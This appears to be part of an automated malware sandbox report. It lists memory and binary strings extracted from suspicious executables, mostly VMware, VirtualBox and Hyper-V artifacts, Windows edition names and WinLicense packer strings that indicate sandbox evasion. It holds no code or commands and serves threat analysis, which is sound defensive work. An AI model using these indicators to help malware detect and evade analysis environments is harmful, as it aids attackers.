                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: "Windows 8 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: explorti.exe, explorti.exe, 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmp, GIEHIDHJDB.exe, GIEHIDHJDB.exe, 0000000B.00000002.2002492457.0000000000C84000.00000040.00000001.01000000.0000000C.sdmp, CBFIIEHJDB.exe, 00000014.00000002.3371208566.0000000000434000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
                        Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Hyper-V (guest)
                        Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 10 Microsoft Hyper-V Server
                        Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.000000000104C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000056C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: ~VirtualMachineTypes
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.000000000104C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000056C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^o
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2016 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.000000000104C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000056C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: )Windows 8 Server Standard without Hyper-V
                        Source: So7a8eQerR.exe, 00000000.00000002.1677775518.0000000000B34000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1705113996.00000000007A4000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1713395167.00000000007A4000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmp, GIEHIDHJDB.exe, 0000000B.00000002.2002492457.0000000000C84000.00000040.00000001.01000000.0000000C.sdmp, CBFIIEHJDB.exe, 00000014.00000002.3371208566.0000000000434000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: %Windows 2012 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Hyper-V
                        Source: Amcache.hve.10.drBinary or memory string: VMware
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: $Windows 8.1 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: ,Windows 2012 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1962741464.0000000001F47000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 10 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: %Windows 2016 Microsoft Hyper-V Server
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
                        Source: So7a8eQerR.exe, 00000000.00000003.1658853011.000000000143D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: +Windows 8.1 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.00000000018A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7H
                        Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: xVBoxService.exe
                        Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.00000000018A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\bf
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000001F1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                        Source: 37664d9843.exe, 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
                        Source: 37664d9843.exe, 00000004.00000002.1957654994.0000000000F1C000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.000000000043C000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: *Windows 11 Server Standard without Hyper-V
